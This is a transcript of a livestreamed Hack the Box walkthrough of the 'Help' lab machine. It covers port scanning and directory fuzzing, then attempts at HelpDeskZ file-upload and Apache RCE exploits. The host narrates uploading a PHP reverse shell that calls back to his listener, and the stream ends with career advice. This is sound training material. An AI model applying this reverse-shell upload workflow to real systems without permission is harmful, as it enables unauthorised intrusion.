Everyone? Welcome to the stream. Thanks for stopping in. Glad to see you here. Today, we have help on Hack the Box. As you can see, I already got the machine already started. And before I start hacking, gotta play my disclaimer. This demo is for educational purposes only. Ethical hacking is legal and differs from illegal hacking. Always ensure you have legal permission before performing what you see in this demo. Alright, with that out of the way, let's get to hacking. Let's go ahead and we're going to do our good old-fashioned Rust scan. And if you don't know, Rust scan is a very fast port scanner. It uses IMAP in the background, but it's extremely quick. You do not want to use Rust scan on production networks because it is very intrusive and very intense on production networks. So this is really meant for only CTFs or times when you need to scan really fast and you can risk a shutdown. And you can see we already got 3 ports open already. We got 22, 18, and 3000. 22, 18, and 3000 here. We'll let that finish up. While that's doing that, okay, it's already done. Let's go ahead and run it again. Sometimes Rust scan is so fast that it misses ports. So I like to run it twice. What's up, WireDogSec? Welcome to the stream. Thanks for stopping in. How you doing today? Welcome back. Alright, so we got the same results here. So let's go ahead and do our nmap command that I normally like to write, which is -s. Oh, can I type? Capital, no. -s capital T. There we go. And we will paste our IP address here. And we will do 80. We'll do 22, 80, and 3000. And for those that don't know, these streams are all machines that I've never hacked before. This is all brand new content to me. I've never touched this box before. I've never completed it. This is a brand new box to me. We call that black box penetration testing when I know nothing about the target. Before going in, the only thing I know about this target is what you've already seen. I got 22, 80, and 3000 open, and I know the name of the machine is help, and that's all I know. I didn't even look at if it was a Windows or a Linux machine. And quite frankly, it doesn't really matter because we'll find out eventually. But while that MF scan is running, so this MF scan, if you don't know, is basically I'm just doing a deep dive on 22, 80, and 3000. That's all I'm doing here. It's looking for vulnerabilities. It's looking for service version numbers. It's running different scripts to find whatever and all information it can. Now we will go to, so port A is open, so it's most likely a web server. So if I just type this IP address in my web browser, it should take me to some sort. We have a new subscriber on YouTube, Segor Heong. Am I saying that correctly? If not, please correct me. Thank you so much for subscribing to the channel. Really do appreciate the support. Okay, so this is actually seems like the first box on Hack the Box that makes you change this. As you can see, so most of the time, at least in the modern ones, modern boxes on Hack the Box, you go to the machine and then it will tell you can't be reached, and it will redirect you to help.htb or whatever the machine is. And that means you just gotta add it to the Etsy host file, which we're gonna do momentarily. Before that, I gotta welcome Neo Fetch to the stream. Thanks for stopping in. Glad to see you here. How you doing today? Alright, so all we have to do now is we'll open up a new tab here. We got to do a nano Etsy host. And then, so teacher was the last box we did. So this box is help. And we just got to put our IP address here, paste that, and that's good to go. Now, if we go back to our web browser and we refresh, we should be able to connect. We can. So help.hackthebox or help.htb works now. As you can see, we have an Ubuntu or Apache 2 Ubuntu default page. So we got connectivity to the machine, so that's good. Looks like we should probably fuzz this. So let's go ahead and clear this out. Not secure. Clear. And we would do Buster. It's very similar to Dirbuster, Derb, or GoBuster. It isn't installed on Kali Linux by default. You don't need it. Like I said, you can use GoBuster. Well, GoBuster's not installed by default either, if I'm not mistaken, on Kali Linux. I think Derb and Dirbuster is at least. But I like Buster, but sometimes it's a little annoying. If you watch my streams enough, WireDogSec knows that sometimes Buster just is too much input, too much output sometimes. But I like Buster because it's very in depth. But sometimes like, okay, I don't want that much depth. But we're gonna run it here. So it's http help.htb, and we're gonna use this word list here. We're gonna get rid of the -d. And I don't explain this much in many streams, but -c is basically I don't want to see any 401 errors. I don't want to see any 404 errors. I don't want to see any 403 errors. And -k means I'm ignoring all certificate mismatches and all that. Like anything that's wrong with the certificate, because some of these older Hack the Box machines have old certificates and they just won't let you communicate with them. So if you do a -k, lowercase k, that will nullify any certificates, because I really don't care about the certificates. I mean, there's potentially vulnerabilities in there, you know, in the real world, but for these CTFs, certificates really, it don't matter if they're outdated, you know. But obviously in the real world, you don't want your certificate outdated. That's not good. DirSearch, is that installed by default? I don't think I've ever used DirSearch. If I have, I don't remember. Alright, so we have /support /JavaScript. Support has a few under support. Our mmap scan's still running. There are some interesting directories here. We should probably go, I don't know where to go first. Let's just go to /support and see what's there. The machine's called help, and support is like, you know, helping. So maybe it is under support, you know what I mean? And this is what's wrong with Buster. Sometimes Buster is so fast that it freezes up the machine where it's like, see, it's still loading for me. With -c 401, when you miss API endpoints, 401 is good to do some BAC testing. Yeah, you're probably right about that. You're probably right about that, HunterBot. Also, HunterBot, thanks for stopping in. Glad to see you in the chat over on Twitch. Appreciate you being here. I'm not really concerned with API endpoints on these easy boxes, if I'm honest with you. But I never even considered that. Maybe I am. Yeah, that's good to know. I'm glad you mentioned that, because if I'm doing a more in-depth thing, I might get rid of the 401. Well, /support's not working. It's loading. It's not giving me an error, but it's also not loading anything either. So therefore, I think tiny MCE. Support upload tickets. Ooh, might have to have something to do with tickets. Upload articles. This is the most interesting part right here, where you can upload tickets. So that's probably where we should go. Includes languages. We'll just let this run. This probably shouldn't take too long. But this is why I like to nullify the 400s, because look how many errors it's producing. See all this? 15,000 errors. Like if I didn't do the dash 403, 404, 401, then it would just be, this would be super long. This would be unmanageable. Let's see if our mmap scan is done. It is, so let's see what we got here. Start from the top. There's a lot of output here. Let's see what we got here. So 22, port 22, looks like it's running SSH. We got a 10.0 vulnerability. That's rarely exploitable on Hack the Box, or like that's rarely the path forward. So we're not gonna mess with port 22 right now. Port 80, we have Apache HTTPD 2.4.18. Once again, it's usually never Apache vulnerabilities that get you in. Sometimes it does, but we don't even. I mean, it might be, but once again, it's one of those things like these older Hack the Box machines. They run outdated versions of Apache, and that's rarely the way forward. I mean, I'm sure we can exploit this, but it's not going to be easy, or it's not going to be the easiest way forward. But it might be, you know. I mean, we got a Metasploit module right here, so that's pretty cool. So we might actually try that, because there is a Metasploit module for this. Normally this output doesn't give me Metasploit modules. Okay, let's. The further we go down, the less severe it is. Let's see what's on port 3000. 3000 is an interesting port because it kind of sticks out. We have a Node.js Express framework. So we got a Linux box here. 3000, I don't know what's on 3000. It's a Node.js Express framework. I don't. Maybe there's a CVE error. Script execution failed. Doesn't look like anything interesting is on 3000. Alright, well, we're kind of stuck now. I don't have anything else to try, so let's just go ahead and we're going to close. We're going to quit for rocks here. This is enough output to get us started. I really want to go here. I really want to check out support/upload/tickets and see where this goes. Oh, it doesn't go anywhere? Question mark? How does this not go anywhere? It doesn't go anywhere, huh? That's weird. What if we try this? It's doing /tickets, so we just do /uploads maybe? Nothing. That's weird, dude. This is a directory listing, so let's go to controller/admin, see if we can look here. See what this is about. Alright, so we got a directory listing here, so this is good to have. Departments. Okay, that's nothing. This page isn't working. Unable to handle the request. Wonder why. All these aren't working. Let's go back a directory. No, that didn't work. I guess you're right. I guess it is a redirect, but it's the same. mean, what if we just tried instead of doing nothing? Probably why it's called help. That's what I was thinking. Why it's support. Everything's broken. Everything's broken. Dude, everything is broken. None of these are working. We got a support controller admin, like directory listing here. We can also check out these other directory listings. There's one at staff and client. So let's see if we can find one at staff. Alright, so there's some more stuff here, but again, none of these are working. This page isn't working. HTTP error 500. Tickets view. Probably because maybe we need to authenticate first or something. I don't know. Let's see what else we got here. We can do support / images maybe. Yeah, I might have to use burp. Nothing at images. Let's try articles maybe. Awesome, dude. See if we can go here. This is a status 200 settings action.php. Let's see what goes here. This is a status 200. Can I do a curl on this? See if we get anything. No. I'm gonna clean this up a little bit. I don't need this hash txt anymore. I don't need this hydra session anymore. I don't need this pass.txt anymore. Try to tell what boxes these came from. I try to keep them organized, but sometimes I forget to put them in the right directory. So we'll delete all of that. We'll keep these Ferox sessions alive. We will change directory to hack the box. We will make a directory called help, and we will change directory into help. And then we will do a wget and then see if we can just download that. If we cat settings php, nothing. Okay, well that didn't work. We'll remove settings .php because that's nothing. Alright, well, can't download it, can't view it. It didn't give us an error. Let's go back to our Ferox Plus results. I think password action. Now that looks, oh, that's a 500. That's not gonna help us out any much. I should actually do a -C 500 too. This should be a directory listing, and again, none of it works. I guess I didn't check view page source. Nothing. Well, let's do this. Let's do Feroxbuster again. But this time, we're going to do a -D2. That way it's only a depth of 2. That way we don't get as much output here. And see if there's anything other than /support that might pop out at us here. See what happens. In the meantime, I mean, this might be a... I don't know what this is. Node.js Express Framework 3000. So that's something that we got to check if we can't find anything interesting on the web server. But I mean, there are Metasploit modules here that we can try. So let's just try it and see what happens. What's the worst that can happen? So let's do... Metasploit framework. Yeah, let's just try this. We'll let Metasploit here. What's up, Matt Fenton? Welcome to the stream. Thanks for stopping in. Glad to see you here. There has to be a login page somewhere. Yeah, there probably is. We didn't let Feroxbuster. I mean, it barely got through the whole word list. I mean, look. That's why I ran it again with a depth of 2. Because the first time it ran, it only got, like, you can see, like 25% done. So there's still way more word lists to go through. Which is why I ran it again. So we're going to run that again. But this time we're going to do a depth of 2. So we don't get it trying /support a million times, you know. And it's only going to... You would just have /support, nothing after it, like this? I think I tried that already. Oh, how did I not try that already? What the heck? How did I not try that? Well, looks like we got some support tickets here. So we can log in, we can search our knowledge base, we can submit a ticket. Powered by Help Desk Z. So let's see if there's any exploits for Help Desk Z. Help Desk Z exploits. There might be an exploit here somewhere. Oh, look at that. Arbitrary file upload. I was thinking, that's what I was thinking when you can submit tickets. That's what I was thinking, file uploads. What is this? This is unauthenticated shell upload vulnerability. Enter anything in the mandatory field attached to PHP. A PHP shell.php, solve the caption, and submit your ticket. Call this script with the base URL of your helpdesk Z installation and the name of the file you uploaded. Alright, well, that sounds easy enough. We just gotta figure... Okay, so submit a ticket. Make this a critical priority. This probably don't matter. Subject. I'm hacking you. Get pwned. Okay, so we just gotta upload a PHP shell. So we will. Do I have the pentest monkey file? I don't think I have it saved on my computer. Let's go ahead and grab it. Pentest monkey PHP reverse shell. Good old-fashioned pentest monkey PHP reverse shell. It's probably my favorite one to use. It is very, very reliable. So all we gotta do is copy this, and we will do. We'll keep Metasploit open for now, but let's change directory /home Kali downloads, and now I will do a nano PHP shell.php. Paste our PHP shell code here, and all we got to do is change the IP address. So our IP address is this. It is 10.10.16.25, and then I want to listen on port 443. That's not 443, that's 553, 443. Control X, Y, enter to save. Clear that out. We'll do a netcat listener over here. Netcat LNVP 443. So we're listening on port 443, and if we catch a shell, we'll be here. I'm going to rename this to listener so I just know what it is. Listener. And what name is that for rocks? This is nmap. And this is Metasploit. There we go. Organization. Alright, now we just need to upload that file. Oh, here it is. I was like, why is this blank? Choose file. We will go to our downloads and we will do shell. Where's it at? I could have sworn I put a file called shell.php. There it is, right there. It's just right under my nose. Alright, enter the CAPTCHA V98NC, and we will submit. Invalid verification code. I mean, I hate CAPTCHAs so much. I never get them right because I'm a machine. Alright, so it looks like I submitted a ticket. Now, we got this guy's exploit code that will call the script with the base URL of the help.z installation and the name of the file you uploaded. And then what happens? Does it just trigger it? Let's read this a little more. He like wrote it twice. It doesn't make any sense. I'm assuming it just triggers it. Let's just... I don't know. I think it just... Alright, so how do we do this? exploit.py, HTTP localhost, so the base URL. In it, PHP shell. Okay. So it's Python 3, exploit.py, and then our URL is http://help/ the base URL is /support. So this is our base URL right here. I think we might have to get rid of the /support for this to work, but I think we want to do the /support. And then we want to do the name of the file that we upload. So it was literally shell.php. See what happens? Oh, I think this is Python 2. Let's try that again. Run this in Python 2. There we go. Working, no errors yet. Nothing on the listener. See what happens here, I don't know. I don't know what's going on. It's just like, seems like it's frozen here. This exploit doesn't seem like it's all that sophisticated or really reliable. So let's just duplicate this tab and we'll go back on here and well, there's help right there. I mean, that's a write-up. So we're on the right track here. I think we found a vulnerability. Has that Mr. Robot mask always been there? No, it hasn't been there for a while. I had it back there in my early streams in a lot of my YouTube videos that I did like a couple months ago. It was back there, but I moved and I had a month-long period where I didn't have my stuff. So I didn't have my bookshelf, didn't have my Mr. Robot mask. So now that I got my stuff in the mail, that I got my stuff delivered to me now that I moved, because I moved across the country, I can start setting up my background a little bit. So I'm going to start slowly building that up together. So it's always been there, but it hasn't been there for probably about a month and a half now. Because it took a month for my household goods to get shipped across the country. Sorry, I did not find anything. Whack. You have one as well? Nice. That one's a special one because it's a nice little glass case and it's got RGB lights around it. Although the RGB lights I accidentally broke. I don't know how I did that, but and then it was a going away gift from the military. My last unit when I was going away, my friend and supervisor at the time. Well, he wasn't my supervisor at the time because he got out of the military for me, but he got me that gift, and then they signed the back of it and stuff. So that was pretty cool. He was like, I know you like streaming. I want to get you something that you can put in your background. I'm like, well, now I got to put it in the background every stream. Or all my YouTube videos, you know. I just gotta fix the lights. I might have to buy new lights because I think I might have broke them. I unplugged it to make it travel friendly, and I think I messed up the cable on the inside of it. Look, there's authenticated SQL injection. So if we get authenticated, then we can maybe even use SQL injection. But this, I don't know what it's trying to have me to do here, but I guess let's try this again. I don't know, man. Maybe the file that I tried to upload didn't. One of the fields is empty. Oh. Oh, that's what happened. See, when there's an error, it clears out the file. That's what I did wrong. I thought it would stay. So when I filled that caption, it cleared out the file. So if we get an error, we have to make sure that we have to choose the file again. What did I do wrong this time? One of the required fields is empty. Test at test.com. What do you mean? These are filled. Maybe I have to put it in the message. Maybe that's part of the mandatory field. There's no star in the message, just a subject, but I mean, how can you have a help desk support system that doesn't allows you to just send a blank message, so it makes sense. It just doesn't have an asterisk next to it. VWAV, I don't know if that's an I or an L. Probably an I. It's all capitalized, so hopefully that works. File is not allowed. Well, now come on. They must have fixed it then. Maybe this is a different version of helpdesk Z. Maybe this is a newer version. We didn't have a version number, we're just taking a guess here. Yeah, file is not allowed. It doesn't let you upload PHP. Whack. Alright, well. Let's just view the source. See if we can get a version number on this. Helpdesk Z Support Center. News, account information. Admin at help.htb password. Whack. Didn't it say something about image file earlier? Well, let's look here. Unauthenticated shell vulnerability. The software in the default configuration allows upload for PHP files. I think developers thought there's no risk. This isn't, yeah, I tried to upload PHP files and that didn't work. So, yeah, see, they use PHP as an extension, so this isn't the right vulnerability here. This is like a patch version. So maybe yeah, I don't know. I thought we had an exploit. It's just helpdesk Z, is that what it's called? Helpdesk Z, yeah. That's the one we just tried. Arbitrary file upload. Authenticated SQL injection. Well, maybe there's a way we can get a login somewhere. Did I quit Ferox or is it just done? Oh, it's done. That didn't help. Well, back to Metasploit we go. I mean, this might be the way. Exploit multi. I wish there was a way to. Where's the CVE number for this? We can just copy this maybe. What just happened? Let's try Apache 2.4.18. No results found. Alright, well, let's try this then. Oh, this is for the slow Loris attack? No, this isn't the same thing. Where's the CVE numbers here? Oh, there's one here. That's an old one. It's a slow Loris. I don't want that. That's a DOS. I didn't. Oh, yeah, that is fallen Loris. I thought it was a different one. Okay, never mind. Scroll down. There's no CVE numbers for these though. This is just an exploit for Metasploit right here though. Let's go to this URL. Can I just click this and go there? No. Copy link address. Traversal RCE. Does this have a CVE associated with it? It does. There we go. We will use 0. This is definitely unintended if we do this because this machine came out before 2021, I believe. So when did this machine come out? Machine info. Release date, yeah, 2019. There's more info there, but I'm not going to read that because it's usually a pretty big hint. So I didn't read that paragraph. But yeah, if this works, this is definitely unintended because this exploit came out after this machine came out. So that's quite interesting, right? What if we set our host to, let's grab our IP address here and we will set that. Set lhost to 10.10.16.25 and we're running. Yeah, let's just run and see what happens here, right? No response. Target seems down. 10.10.16. Target's definitely not down. Our host is set. What if we do... Oh, we gotta change the base path. Maybe... I don't know. Target hosts. Can we... set target URI to help.htb/cgi-bin. Let's run that. See what happens now. Nope. No response. Target seems down. Aborted due to failure. Not vulnerable. The target is not exploitable. Well, it doesn't seem like we're exploitable here. Nmap gave us a little bit of a false positive, maybe. Maybe we're just setting this up wrong, but either way, I don't think we can pursue this any longer. Let's try... This one's a doozy, man. Well, I have to assume that the vulnerability here is within /support. Like it has to be here. It has to be help.z. I'm very confident. I mean, you just can't call a machine help and then make an app called help.z and then not be the initial access, right? So I think the machine being called help is a big hint for this. So I think the exploit somewhere in here. WireDog thinks it's the file upload. It wouldn't let you upload the file. I mean, we can try some bypass techniques, but I feel like it would tell us that we had to do some bypass trickery. You know what I mean? If this was vulnerable, but I mean, maybe we just gotta find. Let's go back. Maybe there's another way to exploit this. You know? This is the same code that we just used. Okay, so that's the same guy. I guess you're right. I guess it could be a different type of file. Let's see if it'll take an ASPX file. No, that wouldn't work. That wouldn't work. A TXT file? I mean, let's see if we can just give it a PDF. Give it a different hack the box right out. That's funny. VADIW. Let's see if let's take a PHP or a PDF. Here, please specify a valid email address. Oh. That's not a valid email address, so somehow. Files not allowed. Let's fuzz file extensions. No, that ain't gonna work. We have to actually have files to fuzz. Well, I can't believe it would take a PDF. Let's do... Let's make a simple txt file here. Choose a file, test.txt. We'll see if this will get accepted here. That looked like it worked. Now, what if we ran... exploit.py, what was it? HTTP help.htb/support test.txt. Where did it go? I know that's what this is for. That's what this Python script's for, I think. It tells you where it goes or something. Because from my understanding, reading this code, I didn't say it out loud, but reading this code here, basically, like, it takes the file name and it gives it a random name. Like, it would just give it a bunch of random characters, and then what it does is it figures out what the application rename that file, and then you can navigate to it. So that's what this is supposed to do. It's supposed to, it uses the timestamps. See it right here. The software in the default configuration allows upload for PHP files. I think developers thought it was no risk because the file names get obfuscated when they are uploaded. However, there is a weakness in the rename function of the upload file. So by guessing the time the file was uploaded, we can get RCE, steps to reproduce. Alright, it says submit ticket display form. Is that where we're at? That's where we should be at. Yeah, that's exactly where we're at. Enter anything in the mandatory fields. Call the script with the base URL, your help desk Z installation, and the name of the file you uploaded. So in this case, he, exploit.py with the URL with its file name. And then basically it's supposed to spit back out, the name, the location of the file that you uploaded. Is what it seems like. See? Sorry, I did not find anything. Let's try it one more time. Just in case I might have forgot to upload a file. Let's try it one more time here. Plus these things clear out automatically after a while sometimes, so please verify special. How? Oh, I did test at test.com. Alright. Choose file. See if that works. Seems like it worked. Let's try this again. I mean, it might. What if we just made it, take a PHP file and just gave it a txt extension, That might be the way. We just change the extension. Matter of fact, let's do that. What's up, Hunterbot? Oh wait, I already said what's up to you earlier. You've been watching. But yeah, there is a SQL injection exploit for this. Well, I don't know what version of how it does Zio. I'm trying to exploit here. I don't see a version number, but there is a SQL injection for a version of this, yes, but it is authenticated. Sorry, I did not find anything. That's unfortunate. Let's try this. Let's see if this will work. Let's move shell.php to shell.txt. So it's the same file, it's just a different extension. See if it takes that. Shell.txt. If this takes this, then we know that there is a possible exploit here. It did take it, so that's good. That's very good. We just need to figure out why it's not finding our thing. Maybe it says base URL. I mean, that's the base URL /support. I mean, maybe if we just, instead of doing /support, no, I think /support is definitely necessary. Because that's the base URL for this application, yeah. Knowledge base. Search. Nothing. News. Help desk software. Powered by Help Desk Z. That's all we got, man. Well, maybe I don't need this weird exploit code. I can just maybe figure it out myself with Furox Buster, maybe. Maybe it's in /controller somewhere, you know? We see some random file names in /controllers. Maybe we can just navigate there ourselves. /admin. /staff. Params. Not seeing anything. There's another one. It was /client. Nothing there. Alright. It's hard to not find anything. Dang, dude. What in the heck is going on? Or if we should, instead of doing /support, just do / or just help.hackthebox. See if that changes anything. Maybe we gotta get more. Oh, that actually worked. No, wait, never mind. That broke. That broke it. HTTP connection pool host help.htb. What's this? So that didn't work. Not help, it's support. Is the base URL slash or slash support? Well, it seems like when I did just slash, or it seems like when I took away slash support, it actually broke. Like I got this error. But when I do slash support, it works. It just doesn't find the file. It needs a trailing slash. Oh, you think so? That's a good point. I hate when things are like picky about trailing slashes being on or off. It's like, man, that's what messed me up, you know? If this works, I'll be like, man, that's kind of dumb. But, you know, it is what it is. Computers be like that sometimes. That's what I do, Yugi. We should start a currency system for this chat and be like, have people bet fake currency on whether the exploit's gonna work or not. That would be a fun game. Will the exploit work? Bet your Kyser coins now. I'm still thinking. We're gonna know here shortly. I'd say how long this takes to figure out. It's gonna use some magic, you know? I don't know what it's doing in the background, but basically it's just checking timestamps and then comparing them with something. Yeah, I didn't find anything again, dude. Even with the trailing slash, it still didn't work. That's most unfortunate, dude. That is very, very unfortunate. What if we tried... I don't know what else to try. You get a slash support. Slash support works. There is a trailing slash here. What if we got rid of the HTTP and just did help.htb? Nope. It looks like it depends when you did help.htb. It did help.htb. So you might need to find correct place to where you get uploaded. It could be support/upload. Yeah, you might be right. There is uploads. I didn't even... Where's our Furox? I mean, yeah. I mean, uploads is definitely a thing. See, support/upload/. Let's try that. See if that works. Maybe we just got to do a /uploads with a trailing slash. And if the trailing slash doesn't work, then we'll try it again without the trailing slash. This has got to be the exploit. And if not, then it's like, dude, this is one heck of a rabbit hole. That's for sure. Well, you could do a Hail Mary and just go for it. What do you mean? What kind of Hail Mary? I love Hail Marys. See if this works, man. Try the PHP upload again and then run that Python script. Yeah, but if it can't even find the TXT files I uploaded. I'm waiting for the moment which Kyser will have sufficient public to create a Telegram or Discord. I have a Discord. It's in the description. I don't think it's in the description of Twitch. It might be. I can't remember. It's definitely in my descriptions on my YouTube channel, that's for sure. What's up, Atif Band-Aid? Hopefully I'm saying your name correctly. If not, feel free to correct me. Appreciate you stopping in. Glad to see you here. What's up, Julio? Thanks for stopping in. How you doing today? I read the code. It says the base URL. So you're saying just HTTP/? It doesn't seem right, but we'll see. Yeah, if you just open up the description of this stream, it should be there. If not, let me know and then I'll just link it, but it should be in there. I wonder if they did some weird CTF thing here. They probably did. Exploit.py, yeah. Well, it's not called help.z. That's why that's why I'm doing /support. Yeah, maybe it has been too. Maybe I do need to re-upload it. That's a good point. Let's try that again. Didn't find anything. I would try burp, see what file extension is accepted here. I don't think it's a file. Well, we know TXT gets accepted. I need this script. If it can find the TXT file, then we know that this little script works. And then we can go from there. Without the trailing, yeah, that's what I was thinking too. I figured I'd try without the trailing / just in case, but I think you're right, HunterBot. We'll try one more time here. Gross. What if we do upload / tickets? I know that's a thing too. Maybe that's where it gets stored. You know what I mean? We haven't tried / tickets yet. Yeah, see upload slash ticket. So that's probably what we need to try next. Let's see what happens here. Yeah, that would make sense. Slash tickets makes more sense to me anyways. And then there might even be one that's further than slash tickets. Like slash tickets might not be it either. It could be like slash tickets slash, who knows, support again. You know what I mean? Let's look here. So yeah, slash uploads. There's slash upload slash articles. There's uploads tickets. It's gotta be tickets, dude. If this doesn't come back correct, I'm gonna be a little shocked and a little upset at the same time. I appreciate it, Neo. The channel is growing slowly but surely, which is exactly what we'd like to see. I gotta get in the Discord more often. I made it, and people started joining it, but it's not very active. Oh my gosh, it's still not working. I don't know what to do. I'm missing something here, man. Let's try uploading this one more time just in case it cleaned itself. APEK5. Submit. That worked. Let's see if that works. Let's try one more time. I hate how long it takes for this to work. Like, you have to wait, like, it feels like 5 more minutes just to try again. Let's see if we can go to slash upload slash tickets. It's not loading. It's just like kind of dead right now. Connection was interrupted. Maybe the machine broke, dude. You know what I mean? Oh, I definitely broke something. Now not even the support submit a ticket section is working. I think the machine broke, guys. No, Ferox isn't running anymore. Hasn't been running. I don't know what I did to break it. It was working fine. Maybe this script broke it. I have to reset it maybe. I hate how long it takes a script to run. That's the worst part about this whole thing. It's like, man, if it just worked a little faster, we can trial and error this so much better, you know? It's like trial and error is cool and all, but when it takes so long for the results to come back, it's like, dang, dude. This is actually taking a lot longer, so I'm assuming that the machine broke. I really do think it did. Let's just try to go back to submit a ticket here. Try to load this up again. It doesn't seem like it's loading, so I think we gotta revert to machine, guys, unfortunately. I think that's the way forward. So we're just gonna quit this script here. We're gonna clear this out, and we are going to close out of that and close out of this, and we're gonna revert to machine. Network error? How do I have a network error? I can't even reset the machine, dude? Am I connected to the VPN? VPN. Maybe my VPN died, dude. I think my VPN died. That's the problem. It's not the machine. It's my VPN. See that? I gotta re-download the VPN, I guess. I don't know. It was working. Damn, I've never had a VPN die on me in the middle of a box. So let's download our VPN. I can't regenerate VPN. Let's just oh my gosh. I can't regenerate VPN. I can't download a VPN. I can't do nothing. Stop. We're gonna wait for this to get terminated. Let's terminate the machine here. And hopefully it lets us download a new VPN pack.
Access granted.
Hey, Dave Martin, thanks for the follow over on Twitch. Appreciate you. Do you have a network connection? I mean, my internet's working fine. The stream's still up and running, so it's not my home internet, that's for sure. It's the Hack the Box VPN. It's broken. Yeah, we're gonna re-download. We're gonna re-download our VPN. We're gonna regenerate a VPN pack and then re-download it. Did your VMware have internet connection? That's a good point. Does it have an internet connection? Oh no. How did my VPN? My VM don't have an internet connection. That's what it is. Can't even go to Google. How did that happen? Huh. Well, let's that's weird. I've never had my VM lose wire connection. Let's see if that works. Yeah, it looks like it's reinitializing a wire connection here. But I might just have to restart the machine or restart the VPN or yeah, let's just shut this down. And let's just reboot it, dude. I've never had that happen to me. Hopefully it didn't break. I might have to download a whole new Kali VM. Dude, if I have to download a whole new Kali VM and install everything again, oh my gosh, that would not be fun. Turn into a tutorial on how to set up a Kali Linux VM. It's still being weird up here though, you know what I mean? It's like, why is this spinning up here? Gotta use snapshots. Yeah. I should probably start using snapshots, but I didn't even do anything to make it to trigger that though. I didn't mess with any of my interfaces or nothing. How did this break? Let's look. I think I need to shut this down again and mess with the settings here. Well, I'll just go to settings here. It's on that, which is good. That's what we want. I mean, let's just hit bridge maybe and see if that changes anything. Bridge is not ideal, but let's see if that changes anything. While powering on, why that? Close out of this, bro. I had mine set to bridge before. I'll use bridge every now and again. It depends if I want to connect it to my home network or not. Generally speaking, I don't want my Kali Linux box to be connected to my home network, but it could be a solution, you know what I mean? Putting it in bridged here. I don't know why I was getting that one error, but the fact that I just closed out of VMware and relaunched it. Oops. What's up, General Beerus? I did see you follow the channel when I wasn't live, so I do appreciate you following the channel when I wasn't live. Welcome to the stream. Thanks for stopping in. Hey, bro, new to the channel. I just got into cybersecurity. Do you know if taking the IBM course on Coursera for the cert will be enough to get me a job, or do I need a CompTIA cert? Honestly, bro, I don't think an IBM course is gonna do anything for you. I mean, it's gonna teach you stuff, which is good. You always want to learn something, but I mean, I don't see a lot of people having the IBM cert. I have never seen a job posting with an IBM cert or IBM courses. I mean, you can finish that course and use that knowledge, because any knowledge is good knowledge, right? But I don't think it's enough to get you a job in any position. I think you should definitely go for a CompTIA cert after you're done with that IBM course, or you might even want to just quit doing the course and then go the CompTIA cert route. So you kind of have two options: finish the course and then go to CompTIA cert, or just stop doing the course and then go CompTIA cert. But to be brutally honest with you, I don't think that IBM course is worth a whole lot. I don't know what I don't hear a whole lot of people talking about that IBM courses, so I don't know how good they are. But what I do know is that they're not on any job postings. It looks like my connection's fixed now. That's pretty good. That was annoying, right? That was... Hopefully that helped. I currently have a BBA in business admin, but I do not know if that would be enough. I don't know. It depends on the employer. A lot of employers, they want something in a cybersecurity or related field, and that's definitely not a cybersecurity related field. However, business admin applies to everything, so in a way it is a related field because business administration applies to everything. If you ask me, my minor is in business administration, and I'm thinking I probably am going to get my MBA after I get done with my master's degree in cybersecurity. I do want to go the MBA route because I think business admin is incredibly valuable to have. So that definitely, it's better than having a lot of other degrees out there. So business admin is like a really good degree to go for. It might not be exactly what people are looking for, but having business skills applies to whatever field you're in. So I think you're in a good spot. You just gotta, I would say, go the CompTIA cert route. That's what I did. I would go get a Security Plus. I don't know how to get my foot in the door, so do I need to take a CompTIA to get me in, or should I look for a job directly or other certs like CISSP? But yeah, I learned in the IBM course that IT auditors can work in the finance/business sector. Yeah, for sure. I would definitely get as many certs as you can. That's what got me in the field, was just getting a bunch of certifications. That helped me so much. People like certifications, and people that tell you that certifications don't matter, they're lying to you straight up. They're wrong, in my opinion. Like, they're just wrong. Certs matter. There's like 5 or 6 certifications listed on every single job posting. If they didn't matter, then there wouldn't be any certs on job posting. But the fact that there's, you know, anywhere between 5 to 8 certifications per job posting tells you that certifications matter. So I would get your CompTIA certs, man. Security Plus is a good starting point. That's what my first cert was. It's definitely possible to get that as a first cert, and that's what I recommend to everybody else. If you want like a baby step, because Sec Plus is kind of hard to get into right away. So, sorry, I can't talk and think and hack at the same time, guys. So when you guys ask me questions, it distracts me. Yeah, anyways, if you want something to help you like before Sec Plus, Network Plus is a good one to get before Sec Plus, or you can get Network Plus after Sec Plus. It really just depends on you. If I had to make a recommendation, I would go Network Plus before Security Plus. That way you get a win kind of quick, because Network Plus is a little easier than Security Plus. And then when you go into Security Plus, you're already going to know about 50% of the information anyways, and then you can get Security Plus. And then after that, I would get, depending if you want to go offense security, defense security. If you want to go offense security, go get a Pentest Plus. If you want to go defense security, then go CYSA Plus. And then from there, you're going to want to go get after some more technical certifications. I got a video. I'm going to be making a video about this in the coming weeks. Like, that's going to like fine-tune this thinking that I have to help people like you, because I get this question a lot, and I'm going to make a video that outlines this like crystal clear. Right now I'm kind of just rambling, but that's what I would do. I would get Net Plus and Sec Plus, and then like I said, if you want to go offense security, go Pentest Plus. If you go defense security, go CYSA Plus. And then once you get that done, you want to go specialize in whatever position you want to get into, depending on, you know, offense security or defense security. Nah, man, you're all good. I needed a break from this box anyways. It's driving me nuts. Alright, we don't want guided mode yet. Let's do... My machine's still up. So we can actually probably just do help. We can probably just go there, yeah. Change directory / hack the box / help. I just need a job in this field badly. I was thinking it could apply for an intern and it would teach me everything there, but now that you said it, probably have to get the CompTIA cert first. I mean, you don't have to have certifications. There's definitely people in the field that don't have certifications, but I'm just saying, if I didn't have my certifications, I wouldn't be where I am today. Straight up. Certifications have helped me the most, and that's why I recommend them, because that's it. Certifications get a lot of attention drawn on you, and because they're hard. Every certification is super hard, and they take a lot of time. How long have I been doing it? I've been in the field for over 6 years now. I got my Security Plus in 2018. And then I just been knocking cert after cert after cert after cert. And I'm still going for certs right now, actually. Just a lot of studying, a lot of studying, a lot of sacrifice. Had to give up a lot of my leisure activities. But I have fun doing this. This is more fun than video games to me at this point in my life. I used to play a lot of video games. I quit playing video games to study. And, I mean, this is like a video game to me. Like, just trying to figure out how to hack this box, you know? It's a challenge. Alright, let's do... show.txt and EIJKA. Alright, let's try that. Okay, that ticket got submitted, so let's do Python 2 /support /upload /ticket / see if that works. Yeah, I'll end up doing my matches in cyber if I don't get a job after my certs. Yeah, if you can afford college, I think it's definitely worth going for, like, college degrees. I have a love-hate relationship with college because for me, it's a no-brainer because I'm a veteran. So it's like I might as well use my GI Bill to get my master's degree. If it wasn't for my GI Bill, I probably wouldn't be going for my master's degree right now. I would have just, you know, didn't go in school. So it's really hard to say if, you know, if a degree is worth whatever they're worth. Now, I don't know. I think the average bachelor's degree last time I checked was like 30 grand, and that's on the cheaper 